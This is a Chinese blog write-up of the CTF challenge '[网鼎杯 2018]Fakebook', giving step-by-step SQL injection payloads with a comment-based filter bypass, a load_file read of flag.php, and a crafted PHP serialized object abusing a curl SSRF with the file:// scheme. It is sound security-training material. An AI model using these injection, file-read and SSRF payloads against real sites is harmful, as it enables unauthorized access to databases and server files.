BUU-WEB-[网鼎杯 2018]Fakebook

最新推荐文章于 2024-04-24 17:24:28 发布
最新推荐文章于 2024-04-24 17:24:28 发布
阅读量186 收藏 1
点赞数
分类专栏: BUU-WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24033605/article/details/116703998
版权

在这里插入图片描述
通过dirsearch爆破出网站存在一个**/flag.php**网页,但是无法正常读取。
访问robots协议,发现有源码备份文件。

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

先进行页面功能分析。
常规注册并登录,发现登录后url存在注入点。
在这里插入图片描述

view.php?no=1 and 1=1
#成功运行
view.php?no=1 and 1=2
#成功运行,说明此处存在sql注入点。
view.php?no=1 order by 5
#4的时候不报错,5的时候报错,证明有4个字段
view.php?no=-1 union select 1,2,3,4
#no hack~应该是union被过滤了
view.php?no=-1 union/**/select 1,2,3,4
#成功有回显
view.php?no=-1 union/**/select 1,database(),3,4 
#成功爆出数据库的名称fakebook
view.php?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables.where table_schema=database()
#成功爆出表名为users
view.php?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'
#成功爆出字段名:no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
view.php?no=-1 union/**/select 1,group_concat(data),3,4 from users
#成功爆出注册时的序列化账户
#O:8:"UserInfo":3:{s:4:"name";s:6:"tzzzez";s:3:"age";i:20;s:4:"blog";s:11:"tzzzez.blog";}
view.php?no=-1 union/**/select 1,load_file('/var/www/html/flag.php'),3,4
#借助load_file函数读取flag.php网页内容

方法1:
(借助load_file函数读取结果)
(表格不够大,所以只能通过f12查看)
在这里插入图片描述
方法2:
借助ssrf,通过get函数读取/flag.php内容,由于被过滤,所以无法直接读取。因此借助file协议读取网页内容。读取的payload为:

file:///var/www/html/flag.php

(此时想通过注册时直接读取,但是被拒了)

函数中的user还有一层序列化,此时可以通过sql爆破出的user的序列化进行构建,也可以通过源码进行构造。

<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";
}
$a = new UserInfo();
$a->name = 'tzzzez';
$a->age=20;
$a->blog='file:///var/www/html/flag.php';
echo serialize($a);
?>

在这里插入图片描述
最后通过sql注入,返回file读取的内容。

view.php?no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:6:"tzzzez";s:3:"age";i:20;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

(解释一下为什么file放在第四字段,因为第四字段对应的是blog内容,通过这个点才能读取内容)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

TzZzEZ-web
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【网络安全 | CTF】fakebook网鼎杯2018)解题详析
等风来
07-24 1万+
登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')
2020网鼎杯青龙组Boom
05-12
【标题】"2020网鼎杯青龙组Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙组"可能是比赛中的一个分组或者阶段,可能...
[网鼎杯 2018]Fakebook——SSRF/反序列化漏洞/SQL注入
sGanYu
09-29 3585
解法一 解法二 解法三 考点 • 目录扫描 • SSRF • SQL注入 • PHP反序列化 前言:当我们拿到网站的时候,首先需要对这个网站进行信息收集,扩大漏洞发现的概率,比如whois、指纹识别、扫描目标站点的目录,寻找敏感信息、后台又或者是否存在备份文件,其实靶场也一样,如果觉得麻烦,也可能错过发现一个可利用的漏洞 开始之前,先扫描一下该网站下目录,查看有什么敏感信息泄露 直接扫出了flag.php文件,有是有,但是访问后,回显内容为空,当我们确定了一个
[网鼎杯 2018]Fakebook(思路详细有说明)
weixin_73560599的博客
07-31 678
这题较为综合 涉及了SQL注入以及SSRF和反序列化以及ctf扫目录脚本工具的使用 是一道小综合的题目
[网鼎杯 2018]Fakebook(ssrf漏洞)
qq_44657899的博客
03-16 4587
因为是看了wp才做出来的,所以就直接记录过程和知识点了。 知识点:SSRF SSRF,也就是Server Side RequestForgery—服务器端请求伪造。从字面上来看,与CSRF不同的是,它是服务器端发出的请求伪造而非从用户一端提交。别误会,作为受信任用户,服务器当然不可能做出损害用户信息的事。它是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞。因为它是由服务端发起的,所以它能够请...
BUUCTF——[网鼎杯 2018]Fakebook
m_de_g的博客
04-24 482
【代码】BUUCTF——[网鼎杯 2018]Fakebook
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
2020年网鼎杯青龙组赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
[网鼎杯 2018]Fakebook&[强网杯 2019]随便注&[GYCTF2020]Blacklist
weixin_46133275的博客
08-13 127
不要忘记前面我们是可以看到mysql语句的报错信息的,那么就可以尝试报错注入来获取当前所使用的数据库(不需要使用到select),那么在输入框查询时,就可以直接将数字名表的数据查询出来,不过这里需要注意数字名表中只有一个flag字段,而输入框查询的结果有两个字段,且字段名为。在内的一些函数都被检测了,其实过滤了select的话,一些常规的注入例如:联合查询注入、盲注、报错注入等都无法使用了。个位置,因为我们之前在查users表数据时序列化字符串也是放在第4个位置的,那么应该是第4个位置的数据才会被。
BUUCTF-[网鼎杯 2018]Fakebook
qq_43006864的博客
04-20 1715
打开题目 点击login,一个登陆界面。没啥发现。 点击join。注册一个账号看看。 这里可以看到:http://46021289-6e25-4fee-b4db-f69979ef4362.node4.buuoj.cn:81/view.php?no=1 盲猜可以sql注入。测试了一下,貌似还不需要闭合,直接接语句就可以。 测试出来字段为4,开始尝试获取数据库信息。 貌似有waf,尝试使用/**/绕过。 成功绕过,并且发现注入点...
网鼎杯 2018Fakebook
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
08-25 564
网鼎杯 2018Fakebook题目Writeup
[网鼎杯 2018]Fakebook 1
weixin_46196627的博客
06-11 200
[网鼎杯 2018]Fakebook1 注册发现view.php?no=1 尝试基本的sql语句发现可行,但是存在过滤,union select 可为union/**/select使用 获取回显点。 查询user 发现root权限 在之前用dirsearch扫过备份文件,扫出: 访问robots.txt,存有文件,一个类 在这引入一个load_file函数 load_file函数只有在满足两个条件的情况下才可以使用:1、文件权限:chmod a+x pathtofile2、文件大小:必须小于max
[网鼎杯 2018]Fakebook
d0ud的博客
10-25 189
打开题目,先看看有什么功能,发现查看用户时,网址为 view.php?no=1 尝试 view.php?no=0 得到报错界面。 尝试用"order by"测试,发现存在SQL注入,且得出字段数为4 开始尝试查询 view.php?no=0%20union%20select%201,2,3,4 回显 no hack _ 用内联注释绕过 view.php?no=1%20/*!%20union*/%20select%201,2,3,4%20limit%201,1 然而出现了奇怪的报错 回显第二个
网鼎杯一道web题(fakebook
热门推荐
洞若观火
08-23 1万+
扫描: nikto扫描: 发现隐藏的robots.txt,其中有源码泄漏(/user.php.bak),输入到地址栏,得到文件user.php.bak。然后用御剑扫描,发现flag.php。 user.php.bak源码: &lt;?php class UserInfo {     public $name = "";     public $age = 0;     public $...
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值